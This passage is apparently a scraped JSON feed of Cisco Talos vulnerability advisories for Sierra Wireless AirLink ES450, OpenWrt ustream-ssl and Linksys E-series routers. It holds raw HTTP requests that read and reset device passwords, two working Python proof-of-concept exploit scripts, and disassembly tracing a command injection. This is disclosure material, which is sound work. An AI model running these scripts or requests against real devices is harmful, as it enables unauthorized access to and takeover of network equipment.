The following request shows the MSCIID for retrieving the `user` password for the device in plaintext.\n \n \n POST /cgi-bin/Embedded_Ace_TLGet_Task.cgi HTTP/1.1\n Host: 192.168.13.31:9191\n User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50215)\n Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,video/x-mng,image/png,image/jpeg,image/gif;q=0.2,*/*;q=0.1\n Accept-Language: en-US,en;q=0.5\n Accept-Encoding: gzip, deflate\n Referer: http://192.168.13.31:9191/admin/ACEmanagerX.html\n Content-Type: text/xml\n Cache-Control: no-cache, must-revalidate\n Pragma: no-cache\n Content-Length: 18\n Cookie: token=fd57b4e137a8f9fe1a3c998fc25b0e1e\n Connection: close\n \n rows=1&colsid=5003\n \n\nThis binary has `-rwxr-xr-x` permissions which allows the binary to be executed outside of the web user interface as well, such as if a user logs in over SSH. This allows a low-privilege user to retrieve the password of other users on the system, status of services, and retrieve any other configuration on the device.\n\n### Exploit Proof of Concept\n \n \n #!/usr/bin/env python\n #Author : Carl Hurd, Cisco Talos\n import sys\n import requests\n \n def auth(ip, port, password):\n data = \"\"\"<request xmlns=\"urn:acemanager\">\n <connect>\n <login>user</login>\n <password><![CDATA[{}]]></password>\n </connect>\n </request>\"\"\".format(password)\n \n response = requests.post(\"http://\"+ip+\":\"+port+\"/xml/Connect.xml\", data=data)\n \n try:\n cookies = dict(token=response.headers[\"Set-Cookie\"].split(\"; \")[0][len(\"token=\"):])\n return cookies\n except:\n print(\"Error while authenticating\")\n sys.exit(0)\n \n def main():\n if len(sys.argv) < 5 or len(sys.argv) > 5:\n print(\"Usage : {} [ip address] [port] [password of user] [msciid to get]\".format(sys.argv[0]))\n sys.exit(0)\n \n ip = sys.argv[1]\n port = sys.argv[2]\n password = sys.argv[3]\n msciid = sys.argv[4]\n \n print(\"MSCIID : 
{}\\n\".format(msciid))\n \n cookies = auth(ip, port, password)\n \n data = msciid\n response = requests.post(\"http://\"+ip+\":\"+port+\"/cgi-bin/Embedded_Ace_Get_Task.cgi\", cookies=cookies, data=data)\n \n print(response.text)\n \n if __name__ == \"__main__\":\n main()\n \n\n### Timeline\n\n2018-12-14 - Vendor disclosure \n2018-12-17 - Vendor acknowledged \n2019-01-08 - Discussion to review vendor\u2019s analysis of issues<br 2019-02-26 - Vendor provided analysis of CVSS scoring \n2019-03-26 - Vendor established timelines for fix/public disclosure \n2019-04-20 - Talos provided revised CVSS score on TALOS-2018-0746, TALOS-2018-0751, TALOS-2018-0752, TALOS-2018-0755, and TALOS-2018-0756 \n2019-04-25 - Public Release\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-04-25T00:00:00", "type": "talos", "title": "Sierra Wireless AirLink ES450 ACEManager Embedded_Ace_Get_Task.cgi Information Disclosure Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4070", "CVE-2018-4071"], "modified": "2019-04-25T00:00:00", "id": "TALOS-2018-0755", "href": 
"https://www.talosintelligence.com/vulnerability_reports/TALOS-2018-0755", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}}, {"lastseen": "2023-12-02T16:53:59", "description": "# Talos Vulnerability Report\n\n### TALOS-2019-0893\n\n## OpenWrt ustream-ssl certificate verification information leak vulnerability\n\n##### November 15, 2019\n\n##### CVE Number\n\nCVE-2019-5101,CVE-2019-5102\n\n##### SUMMARY\n\nAn exploitable information leak vulnerability exists in the ustream-ssl library of OpenWrt, versions 18.06.4 and 15.05.1. When connecting to a remote server, the server\u2019s SSL certificate is checked but no action is taken when the certificate is invalid. An attacker could exploit this behavior by performing a man-in-the-middle attack, providing any certificate, leading to the theft of all the data sent by the client during the first request.\n\n##### CONFIRMED VULNERABLE VERSIONS\n\nThe versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.\n\nOpenWRT OpenWrt 15.05.1, via wget (busybox) \nOpenWRT OpenWrt 18.06.4, via wget (uclient-fetch)\n\n##### PRODUCT URLS\n\nOpenWRT - <https://openwrt.org/>\n\n##### CVSSv3 SCORE\n\n4.0 - CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:N/A:N\n\n##### CWE\n\nCWE-295 - Improper Certificate Validation\n\n##### DETAILS\n\nOpenWrt is a Linux-based OS, primarily used on embedded devices to route network traffic. OpenWrt is highly customizable, and ships with a set of tools and libraries that have been optimized to run on hardware with limited resources.\n\nAmong these tools, OpenWrt uses `wget` to allow scripts to download files from the web. In OpenWrt 18.06.4, `wget` is a symbolic link to `uclient-fetch`, while it\u2019s a symbolic link to `busybox` in OpenWrt 15.05.1. 
In both cases, the SSL support is provided by the `ustream-ssl` library, which is an SSL wrapper for `OpenSSL`, `mbed TLS`, and `wolfSSL`.\n\nWhen the underlying SSL library used is `OpenSSL` (package `libustream-openssl`) or `mbed TLS` (package `libustream-mbedtls`), `ustream-ssl` has an issue that could be exploited by an attacker to bypass the server\u2019s certificate check and reveal the whole contents of the client\u2019s request.\n\n#### CVE-2019-5101 - OpenSSL (libustream-openssl)\n\nAfter an SSL connection is initialized via `_ustream_ssl_init`, and after any data (e.g. the client\u2019s HTTP request) is written to the stream using `ustream_printf`, the code eventually enters the function `__ustream_ssl_poll`, which is used to dispatch the read/write events.\n \n \n static bool __ustream_ssl_poll(struct ustream *s)\n {\n struct ustream_ssl *us = container_of(s->next, struct ustream_ssl, stream);\n char *buf;\n int len, ret;\n bool more = false;\n \n ustream_ssl_check_conn(us); // [1]\n if (!us->connected || us->error)\n return false;\n ...\n \n\nThe first action taken is to check the SSL connection by calling `ustream_ssl_check_conn` at [1]:\n \n \n static void ustream_ssl_check_conn(struct ustream_ssl *us)\n {\n if (us->connected || us->error)\n return;\n \n if (__ustream_ssl_connect(us) == U_SSL_OK) { // [2]\n us->connected = true; // [3] connected\n if (us->notify_connected)\n us->notify_connected(us);\n ustream_write_pending(&us->stream); // [4] write to the stream\n }\n }\n \n\nThis function, in turn, calls `__ustream_ssl_connect` [2], and if the return is `U_SSL_OK`, then the connection is assumed to be established [3] and any pending write operations are executed [4].\n\nBecause of the write happening at [4], the function `__ustream_ssl_connect` should only return `U_SSL_OK` when the SSL connection has been checked and the server\u2019s certificate is verified:\n \n \n __hidden enum ssl_conn_status __ustream_ssl_connect(struct ustream_ssl *us)\n {\n 
void *ssl = us->ssl;\n int r;\n \n if (us->server)\n r = SSL_accept(ssl);\n else\n r = SSL_connect(ssl);\n \n if (r == 1) {\n #ifndef CYASSL_OPENSSL_H_\n ustream_ssl_verify_cert(us); // [5]\n #endif\n return U_SSL_OK; // [6]\n }\n \n r = SSL_get_error(ssl, r);\n if (r == SSL_ERROR_WANT_READ || r == SSL_ERROR_WANT_WRITE)\n return U_SSL_PENDING;\n \n ustream_ssl_error(us, r);\n return U_SSL_ERROR;\n }\n \n\nHowever, while the function will call `ustream_ssl_verify_cert` at [5], `U_SSL_OK` will be returned in any case [6]. \nIndeed, `ustream_ssl_verify_cert` checks the connection and returns early [7], without setting `us->valid_cert` (which will stay `false`).\n \n \n static void ustream_ssl_verify_cert(struct ustream_ssl *us)\n {\n void *ssl = us->ssl;\n X509 *cert;\n int res;\n \n res = SSL_get_verify_result(ssl);\n if (res != X509_V_OK) {\n if (us->notify_verify_error) // [7]\n us->notify_verify_error(us, res,\n X509_verify_cert_error_string(res));\n return;\n }\n \n cert = SSL_get_peer_certificate(ssl);\n if (!cert)\n return;\n \n us->valid_cert = true; // [8]\n us->valid_cn = ustream_ssl_verify_cn(us, cert);\n X509_free(cert);\n }\n \n\nAt this point, the SSL connection is established [3] (from the point of view of `ustream-ssl`), and the pending writes are executed on the stream [4], allowing a man-in-the-middle attacker, by suppling any certificate, to read the data written into the stream.\n\nDespite this, the code in `__ustream_ssl_poll` will terminate a few calls later:\n \n \n static bool __ustream_ssl_poll(struct ustream *s)\n {\n struct ustream_ssl *us = container_of(s->next, struct ustream_ssl, stream);\n char *buf;\n int len, ret;\n bool more = false;\n \n ustream_ssl_check_conn(us);\n if (!us->connected || us->error)\n return false;\n \n do {\n buf = ustream_reserve(&us->stream, 1, &len);\n if (!len)\n break;\n \n ret = __ustream_ssl_read(us, buf, len); // [9]\n switch (ret) {\n case U_SSL_PENDING: // [10]\n return more;\n case U_SSL_ERROR:\n return 
false;\n case 0:\n us->stream.eof = true;\n ustream_state_change(&us->stream);\n return false;\n default:\n ustream_fill_read(&us->stream, ret);\n more = true;\n continue;\n }\n } while (1);\n \n return more;\n }\n \n\nAt [9], the stream is read, but the underlying `SSL_read` function (defined in the `OpenSSL` library) will error out and the function will exit at [10].\n\n#### CVE-2019-5102 - mbed TLS (libustream-mbedtls)\n\nThe same issue exists in the `libustream-mbedtls` package; the affected code [11] is similar:\n \n \n __hidden enum ssl_conn_status __ustream_ssl_connect(struct ustream_ssl *us)\n {\n void *ssl = us->ssl;\n int r;\n \n r = mbedtls_ssl_handshake(ssl);\n if (r == 0) {\n ustream_ssl_verify_cert(us);\n return U_SSL_OK; // [11]\n }\n \n if (ssl_do_wait(r))\n return U_SSL_PENDING;\n \n ustream_ssl_error(us, r);\n return U_SSL_ERROR;\n }\n \n\n##### TIMELINE\n\n2019-09-11 - Vendor disclosure \n2019-11-13 - Vendor patched \n2019-11-15 - Public release\n\n##### Credit\n\nDiscovered by Claudio Bozzato of Cisco Talos.\n", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.9, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2019-11-15T00:00:00", "type": "talos", "title": "OpenWrt ustream-ssl certificate verification information leak vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", 
"integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-5101", "CVE-2019-5102"], "modified": "2019-11-15T00:00:00", "id": "TALOS-2019-0893", "href": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2019-0893", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-12-01T16:54:30", "description": "### Summary\n\nAn exploitable Permission Assignment vulnerability exists in the ACEManager Embedded_Ace_Set_Task.cgi functionality of Sierra Wireless AirLink ES450 FW 4.9.3. A specially crafted HTTP request can cause arbitrary setting writes, resulting in unverified changes to any system setting. An attacker can make an authenticated HTTP request, or run the binary as any user, to trigger this vulnerability.\n\n### Tested Versions\n\nSierra Wireless AirLink ES450 FW 4.9.3\n\n### Product URLs\n\n<https://www.sierrawireless.com/products-and-solutions/routers-gateways/es450/>\n\n### CVSSv3 Score\n\n9.9 - CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:L\n\n### CWE\n\nCWE-732: Incorrect Permission Assignment for Critical Resource\n\n### Details\n\nSierra Wireless is a wireless communications equipment designer and manufacturer. They provide both embedded solutions as well as wireless hardware solutions, including both the ES450 and GX450 devices. The AirLink ES450 is an LTE gateway designed for distributed enterprise. The ES450 is typically seen connecting Point-of-sale devices, remote SCADA equipment, or other business critical equipment. The AirLink ES450 also provides a terminal server for remote out-of-band administration.\n\nACEManager is the web server included with the AirLink ES450. This web server is responsible for the majority of interactions in the device. 
Some specific capabilities of the web server are routing, device reconfiguration, user authentication and certificate management. The vendor has stated that the ACEManager web application is not accessible by default from the Cellular WAN.\n\nThese vulnerabilities were discovered and tested using the AirLink ES450. These vulnerabilities most likely also affect the AirLink GX450 product.\n\n#### CVE-2018-4072\n\nThe Embedded_Ace_Set_Task.cgi executable is used to change MSCII configuration values within the configuration manager of the AirLink ES450. This binary does not have any restricted configuration settings, so once the MSCIID is discovered, any authenticated user can send configuration changes using the `/cgi-bin/Embedded_Ace_Set_Task.cgi` endpoint. The following request shows the MSCIID for changing the `user` password for the device.\n \n \n POST /cgi-bin/Embedded_Ace_Set_Task.cgi HTTP/1.1\n Host: 192.168.13.31:9191\n User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50215)\n Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,video/x-mng,image/png,image/jpeg,image/gif;q=0.2,*/*;q=0.1\n Accept-Language: en-US,en;q=0.5\n Accept-Encoding: gzip, deflate\n Referer: http://192.168.13.31:9191/admin/ACEmanagerX.html\n Content-Type: text/xml\n Cache-Control: no-cache, must-revalidate\n Pragma: no-cache\n Content-Length: 15\n Cookie: token=8b61123e579dcaa49a707abc4fcc1016\n Connection: close\n \n 5003=password0\n \n\nThis binary has `-rwxr-xr-x` permissions, which allow the binary to be executed outside of the web user interface as well, for example when a user logs in over SSH. 
This allows a low-privilege user to change the password of other users on the system, enable or disable services, and change any configuration set on the device.\n\n#### CVE-2018-4073\n\nAdditionally, the endpoint `/cgi-bin/Embedded_Ace_TLSet_Task.cgi` is a very similar endpoint that is designed for setting table values. The following request shows the MSCIID for changing the `user` password for the device.\n \n \n POST /cgi-bin/Embedded_Ace_TLSet_Task.cgi HTTP/1.1\n Host: 192.168.13.31:9191\n User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50215)\n Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,video/x-mng,image/png,image/jpeg,image/gif;q=0.2,*/*;q=0.1\n Accept-Language: en-US,en;q=0.5\n Accept-Encoding: gzip, deflate\n Referer: http://192.168.13.31:9191/admin/ACEmanagerX.html\n Content-Type: text/xml\n Cache-Control: no-cache, must-revalidate\n Pragma: no-cache\n Content-Length: 28\n Cookie: token=30578cf7228232d357e029347617af5c\n Connection: close\n \n colsid=5003&data=password012\n \n\nThis binary has `-rwxr-xr-x` permissions, which allow the binary to be executed outside of the web user interface as well, for example when a user logs in over SSH. 
This allows a low-privilege user to change the password of other users on the system, enable or disable services, and change any configuration set on the device.\n\n### Exploit Proof of Concept\n \n \n #!/usr/bin/env python\n #Author : Carl Hurd, Cisco Talos\n import sys\n import socket\n import time\n import requests\n \n from requests_toolbelt.utils import dump\n \n def auth(ip, port, password):\n data = \"\"\"<request xmlns=\"urn:acemanager\">\n <connect>\n <login>user</login>\n <password><![CDATA[{}]]></password>\n </connect>\n </request>\"\"\".format(password)\n \n response = requests.post(\"http://\"+ip+\":\"+port+\"/xml/Connect.xml\", data=data)\n \n try:\n cookies = dict(token=response.headers[\"Set-Cookie\"].split(\"; \")[0][len(\"token=\"):])\n return cookies\n except:\n print(\"Error while authenticating\")\n sys.exit(0)\n \n def main():\n if len(sys.argv) < 6 or len(sys.argv) > 6:\n print(\"Usage : {} [ip address] [port] [password of user] [msciid to set] [msciid value]\".format(sys.argv[0]))\n sys.exit(0)\n \n ip = sys.argv[1]\n port = sys.argv[2]\n password = sys.argv[3]\n msciid = sys.argv[4]\n msciid_val = sys.argv[5]\n \n print(\"MSCIID : {}\\nMSCIID VALUE : {}\".format(msciid, msciid_val))\n \n cookies = auth(ip, port, password)\n \n data = msciid + \"=\" + msciid_val\n response = requests.post(\"http://\"+ip+\":\"+port+\"/cgi-bin/Embedded_Ace_Set_Task.cgi\", cookies=cookies, data=data)\n \n print(response.text)\n \n if __name__ == \"__main__\":\n main()\n \n\n### Timeline\n\n2018-12-14 - Vendor disclosure \n2018-12-17 - Vendor acknowledged \n2019-01-08 - Discussion to review vendor\u2019s analysis of issues \n2019-02-26 - Vendor provided analysis of CVSS scoring \n2019-03-26 - Vendor established timelines for fix/public disclosure \n2019-04-20 - Talos provided revised CVSS score on TALOS-2018-0746, TALOS-2018-0751, TALOS-2018-0752, TALOS-2018-0755, and TALOS-2018-0756 \n2019-04-25 - Public Release\n", "cvss3": {"exploitabilityScore": 2.8, 
"cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-04-25T00:00:00", "type": "talos", "title": "Sierra Wireless AirLink ES450 ACEManager Embedded_Ace_Set_Task.cgi Permission Assignment Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4072", "CVE-2018-4073"], "modified": "2019-04-25T00:00:00", "id": "TALOS-2018-0756", "href": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2018-0756", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-12-01T16:54:50", "description": "### Summary\n\nMultiple exploitable operating system command injections exist in the Linksys ESeries line of routers. Specially crafted entries to network configuration information can cause execution of arbitrary system commands, resulting in full control of the device. 
An attacker can send an authenticated HTTP request to trigger this vulnerability.\n\n### Tested Versions\n\nLinksys E1200 Firmware Version 2.0.09 \nLinksys E2500 Firmware Version 3.0.04\n\n### Product URLs\n\n<https://www.linksys.com/us/support-product?pid=01t80000003KRTzAAO> \n<https://www.linksys.com/us/support-product?pid=01t80000003KZuNAAW>\n\n### CVSSv3 Score\n\n7.2 - CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H\n\n### CWE\n\nCWE-78: Improper Neutralization of Special Elements used in an OS Command (\u2018OS Command Injection\u2019)\n\n### Details\n\nMultiple devices in the Linksys ESeries line of routers are susceptible to OS command injection vulnerabilities due to improper filtering of data passed to and retrieved from NVRAM.\n\nMany of the configuration details passed to ESeries routers during configuration must be retained across a device\u2019s power cycle. Since the device has only one writable directory (/tmp) and that directory is cleared on reboot, the device uses NVRAM to store configuration details.\n\nWhen the apply.cgi page is requested with parameters indicating a change to persistent configuration settings, those parameters are processed by the \u2018get_cgi\u2019 function call, during which they are placed directly into NVRAM via an \u2018nvram_set\u2019 call.\n\nThe following example is the apply.cgi disassembly of the path that is taken to write any passed configuration data to NVRAM. 
Execution starts at address 0x00425C20 where the variables are first loaded, and then enters a loop until all passed variables are processed.\n \n \n ### binary: httpd\n .text:0041FBC4 li $gp, 0xE760C\n .text:0041FBCC addu $gp, $t9\n .text:0041FBD0 addiu $sp, -0x28\n .text:0041FBD4 sw $ra, 0x20($sp) # stores return address onto stack (0x00425CAC)\n .text:0041FBD8 sw $s1, 0x1C($sp)\n .text:0041FBDC sw $s0, 0x18($sp)\n .text:0041FBE0 sw $gp, 0x10($sp)\n .text:0041FBE4 la $t9, valid_name # valid_name checks to ensure the name is expected\n .text:0041FBE8 move $s1, $a1 # $s1 == RAW_MACHINE_NAME_DATA\n .text:0041FBEC jalr $t9 # goto: valid_name\n .text:0041FBF0 move $s0, $a2\n .text:0041FBF4 lw $gp, 0x10($sp)\n .text:0041FBF8 bnez $v0, loc_41FC14 # $v0 != 0 for vulnerable params\n .text:0041FBFC move $a1, $s1 # $a1 == RAW_MACHINE_NAME_DATA \n ...\n .text:0041FC14 loc_41FC14:\n .text:0041FC14 lw $a0, 0($s0) # $a0 == VULN_PARAM\n .text:0041FC18 la $t9, nvram_set\n .text:0041FC1C lw $ra, 0x20($sp) # gets return address back from stack (0x00425CAC)\n .text:0041FC20 lw $s1, 0x1C($sp)\n .text:0041FC24 lw $s0, 0x18($sp)\n .text:0041FC28 jr $t9 # goto: nvram_set(VULN_PARAM, RAW_MACHINE_NAME_DATA)\n .text:0041FC2C addiu $sp, 0x28\n ...\n .text:00425C20 loc_425C20: ## VARIABLE_LOAD\n .text:00425C20 \n .text:00425C20 la $s0, variables # POST data\n .text:00425C24 b loc_425C5C # jumps to start of loop\n .text:00425C28 addiu $s1, $s0, (gozila_actions - 0x4FB070)\n ...\n .text:00425C54 loc_425C54:\n .text:00425C54 beq $s0, $s1, loc_425CB8\n .text:00425C58 nop\n .text:00425C5C\n .text:00425C5C loc_425C5C: ## LOOP_START\n .text:00425C5C la $t9, get_cgi\n .text:00425C60 lw $a0, 0($s0) # $a0 == VULN_PARAM\n .text:00425C64 jalr $t9 # goto: get_cgi\n .text:00425C68 nop # $v0 == RAW_MACHINE_NAME_DATA\n .text:00425C6C lw $gp, 0x860+var_840($sp)\n .text:00425C70 move $v1, $v0 # RAW_MACHINE_NAME_DATA moved to $v1\n .text:00425C74 la $t9, nvram_set\n .text:00425C78 move $a1, $v0\n 
.text:00425C7C beqz $v0, loc_425C50 # $v0 != 0 for vulnerable params\n .text:00425C80 move $a3, $t9\n .text:00425C84 lb $v0, 0($v0) # $v0 set to first byte of RAW_MACHINE_NAME_DATA\n .text:00425C88 move $a2, $s0\n .text:00425C8C beqz $v0, loc_425C2C # $v0 != 0 for vulnerable params\n .text:00425C90 move $a0, $s7\n .text:00425C94\n .text:00425C94 loc_425C94:\n .text:00425C94 lw $t9, 8($s0) # loads an address to check the key name\n .text:00425C98 nop\n .text:00425C9C beqz $t9, loc_425C3C # $t9 != 0 for vulnerable params\n .text:00425CA0 nop\n .text:00425CA4 jalr $t9 # goto: 0x0041FBC4\n .text:00425CA8 move $a1, $v1 # sets arg to RAW_MACHINE_NAME_DATA\n .text:00425CAC lw $gp, 0x860+var_840($sp)\n .text:00425CB0 b loc_425C54 # goto: LOOP_START\n .text:00425CB4 addiu $s0, 0x18\n \n\nAfter certain configuration changes are made, including both of the changes associated with these vulnerabilities, a reboot of device services is required. The httpd binary handles this by sending a SIGHUP signal to PID 1, a binary named \u2018preinit\u2019. When \u2018preinit\u2019 receives this signal it enters a code path where it restarts all necessary system services. This example can be seen in the apply.cgi disassembly below:\n \n \n ### binary: httpd\n .text:00425824 loc_425824:\n .text:00425824 la $t9, kill\n .text:00425828 li $a0, 1 # pid\n .text:0042582C jalr $t9 # runs: kill -1 1\n .text:00425830 li $a1, 1 # sig\n .text:00425834 lw $gp, 0x860+var_840($sp)\n .text:00425838 b loc_4256AC\n .text:0042583C nop\n \n\nWhen the \u2018preinit\u2019 binary enters this code path, it exposes functionality where raw data from nvram_get calls is passed into system commands. Examples for each of the three command injection vulnerabilities can be seen below.\n\nCVE-2018-3953 - machine_name - start_lltd\n\nData entered into the \u2018Router Name\u2019 input field through the web portal is submitted to apply.cgi as the value to the \u2018machine_name\u2019 POST parameter. 
The machine_name data goes through the nvram_set process described above. When the \u2018preinit\u2019 binary receives the SIGHUP signal it enters a code path that continues until it reaches offset 0x0042B5C4 in the \u2018start_lltd\u2019 function. Within the \u2018start_lltd\u2019 function, a \u2018nvram_get\u2019 call is used to obtain the value of the user-controlled \u2018machine_name\u2019 NVRAM entry. This value is then entered directly into a command intended to write the host name to a file and subsequently executed.\n \n \n ### binary: preinit\n .text:0042B5C4 loc_42B5C4:\n .text:0042B5C4 la $a0, sub_470000\n .text:0042B5C8 la $t9, nvram_get\n .text:0042B5CC move $t9, $s0\n .text:0042B5D0 jalr $t9 # nvram_get(\"machine_name\")\n .text:0042B5D4 addiu $a0, (aMachineName - 0x470000) # \"machine_name\"\n .text:0042B5D8 lw $gp, 0x130+var_120($sp)\n .text:0042B5DC beqz $v0, loc_42B6C0 # $v0 == RAW_MACHINE_NAME_DATA\n .text:0042B5E0 nop\n .text:0042B5E4\n .text:0042B5E4 loc_42B5E4:\n .text:0042B5E4 la $a1, aORemoteServer\n .text:0042B5E8 la $t9, sprintf\n .text:0042B5EC addiu $s1, $sp, 0x130+var_118\n .text:0042B5F0 addiu $a1, (aEchoSProcSysKe - 0x480000) # $a1 == \"echo %s > /proc/sys/kernel/hostname\"\n .text:0042B5F4 move $a2, $v0 # $a2 == RAW_MACHINE_NAME_DATA\n .text:0042B5F8 move $a0, $s1 # $a0 == $s1\n .text:0042B5FC jalr $t9 ; sprintf # sprintf($s1, \"echo %s > /proc/sys/kernel/hostname\", RAW_MACHINE_NAME_DATA)\n .text:0042B600 move $s3, $t9\n .text:0042B604 lw $gp, 0x130+var_120($sp)\n .text:0042B608 move $a0, $s1 # $a0 == FINAL_CMD\n .text:0042B60C la $t9, system\n .text:0042B610 nop\n .text:0042B614 jalr $t9 # system(\"echo RAW_MACHINE_NAME_DATA > /proc/sys/kernel/hostname\")\n .text:0042B618 move $s2, $t9\n \n\nCVE-2018-3954 - machine_name - set_host_domain_name\n\nData entered into the \u2018Router Name\u2019 input field through the web portal is submitted to apply.cgi as the value to the \u2018machine_name\u2019 POST parameter. 
The machine_name data goes through the nvram_set process described above. When the \u2018preinit\u2019 binary receives the SIGHUP signal it enters a code path that calls a function named \u2018set_host_domain_name\u2019 from its libshared.so shared object.\n \n \n ### binary: preinit\n .text:0041F040 loc_41F040:\n .text:0041F040 la $a0, aORemoteServer\n .text:0041F044 la $t9, nvram_set\n .text:0041F048 addiu $a0, (aWanRunMtu - 0x480000)\n .text:0041F04C move $a1, $v0\n .text:0041F050 jalr $t9\n .text:0041F054 move $s3, $t9\n .text:0041F058 lw $gp, 0xD0+var_B0($sp)\n .text:0041F05C nop\n .text:0041F060 la $t9, set_host_domain_name # function containing vuln\n .text:0041F064 nop\n .text:0041F068 jalr $t9 # goto: set_host_domain_name\n .text:0041F06C nop\n \n\nThe \u2018set_host_domain_name\u2019 function in libshared.so continues to offset 0x0001FA40 where nvram_get is called against the \u2018machine_name\u2019 parameter. The result of that operation is subsequently combined with a string via a sprintf call and passed directly into system.\n \n \n ### shared object: libshared.so\n .text:0001FA10 set_host_domain_name:\n .text:0001FA10\n .text:0001FA10 var_118 = -0x118\n .text:0001FA10 var_110 = -0x110\n .text:0001FA10 var_10 = -0x10\n .text:0001FA10 var_C = -0xC\n .text:0001FA10 var_8 = -8\n .text:0001FA10 var_4 = -4\n .text:0001FA10\n .text:0001FA10 li $gp, 0xB4800\n .text:0001FA18 addu $gp, $t9\n .text:0001FA1C addiu $sp, -0x128\n .text:0001FA20 sw $ra, 0x128+var_4($sp)\n .text:0001FA24 sw $s2, 0x128+var_8($sp)\n .text:0001FA28 sw $s1, 0x128+var_C($sp)\n .text:0001FA2C sw $s0, 0x128+var_10($sp)\n .text:0001FA30 sw $gp, 0x128+var_118($sp)\n .text:0001FA34 la $a0, aAluesMayBeInco\n .text:0001FA38 la $t9, nvram_get\n .text:0001FA3C addiu $a0, (aMachineName - 0x70000) # $a0 == \"machine_name\"\n .text:0001FA40 jalr $t9 # nvram_get(\"machine_name\")\n .text:0001FA44 move $s0, $t9\n .text:0001FA48 lw $gp, 0x128+var_118($sp)\n .text:0001FA4C beqz $v0, loc_1FBF0 # $v0 == 
